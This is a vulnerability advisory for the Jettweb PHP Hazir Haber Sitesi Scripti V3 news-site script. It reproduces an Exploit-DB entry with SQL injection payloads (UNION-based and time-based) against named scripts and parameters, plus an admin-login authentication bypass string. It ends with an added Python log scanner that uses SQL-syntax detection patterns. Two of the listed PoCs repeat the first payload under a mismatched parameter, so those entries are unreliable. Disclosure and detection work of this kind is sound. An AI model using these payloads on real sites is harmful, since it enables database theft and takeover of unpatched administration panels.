Vendor: PHP Hazir Haber Sitesi Scripti
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Vulnerabilities: SQL Injection, Authentication Bypass
CWE: 89, 287
Product Name: PHP Hazir Haber Sitesi Scripti
Affected Version From: V3
Affected Version To: V3
Patch Exists: NO
Platforms Tested: Kali Linux
2019

Jettweb PHP Hazir Haber Sitesi Scripti V3 – Multiple Vulnerabilities

Jettweb PHP Hazir Haber Sitesi Scripti V3 is prone to multiple vulnerabilities, including SQL injection and authentication bypass. An attacker can exploit these vulnerabilities to gain access to sensitive information, inject malicious code into the application, and execute arbitrary commands in the context of the application. The SQL injection vulnerabilities exist in the 'fonksiyonlar.php' script, the 'kelimeara' script, and the 'datagetir.php' script. The authentication bypass vulnerability exists in the 'login.php' script.

Mitigation:

Developers should never rely on client-side input validation. Input validation should always be performed on the server side. Developers should also sanitize all user-supplied input to prevent malicious code from being injected into the application. Additionally, developers should ensure that the application is not vulnerable to authentication bypass.

Exploit-DB raw data:

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V3 - Multiple Vulnerabilities
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-16-php-hazir-haber-sitesi-scripti-v3.html
# Demo Site: http://haberv3.proemlaksitesi.net
# Version: V3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/fonksiyonlar.php
Vulnerable Parameter: videoid (GET)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/datagetir.php
Vulnerable Parameter: q (GET)
Payload:
datagetir.php?deger=undefined&dog=undefined&komut=ilcegetir&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&son=undefined


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/login.php
Username: '=' 'or'
Password: '=' 'or'
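
Since no patch exists, sites running this script can at least review their web server access logs for the GET-based injections in PoC 1 and PoC 3. The following is an added detection example, not part of the original advisory or the vendor's code: it flags requests to `fonksiyonlar.php` and `datagetir.php` whose `videoid` or `q` value contains SQL syntax. It assumes common/combined log format and that both parameters normally carry plain ids; the `/haber/` path and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> GET parameter the advisory reports as injectable (PoC 1, PoC 3).
WATCHED = {"fonksiyonlar.php": "videoid", "datagetir.php": "q"}

# SQL syntax that has no business inside these values (assumed to be plain ids).
SQL_MARKERS = re.compile(
    r"'|--|/\*|\bunion\b.+\bselect\b|\b(?:sleep|benchmark)\s*\(|\bxor\b",
    re.IGNORECASE | re.DOTALL,
)

# Request field of a common/combined-format access-log line.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, hypothetical /haber/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2019:10:00:01 +0000] "GET /haber/fonksiyonlar.php?fgit=videoyorumlar&videoid=12 HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Mar/2019:10:00:05 +0000] "GET /haber/fonksiyonlar.php?fgit=videoyorumlar&videoid=1%27%20UNION%20ALL%20SELECT%20NULL--%20x HTTP/1.1" 200 498',
    '192.0.2.10 - - [25/Mar/2019:10:00:09 +0000] "GET /haber/datagetir.php?komut=ilcegetir&q=34 HTTP/1.1" 200 230',
    '203.0.113.7 - - [25/Mar/2019:10:00:12 +0000] "GET /haber/datagetir.php?komut=ilcegetir&q=0%27XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR%27Z HTTP/1.1" 200 230',
    '192.0.2.33 - - [25/Mar/2019:10:00:20 +0000] "GET /haber/index.php?q=1%27 HTTP/1.1" 200 9001',
]


def scan(lines):
    """Return (line_no, script, parameter, decoded_value) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue  # not one of the scripts named in the advisory
        # parse_qs percent-decodes, so %27 and %2C are inspected as ' and ,
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if SQL_MARKERS.search(value):
                hits.append((line_no, script, param, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The POST-based vectors (`kelimeara`, `yonetim/login.php`) do not appear in standard access logs, because request bodies are not recorded there; covering them needs body logging at a WAF or reverse proxy.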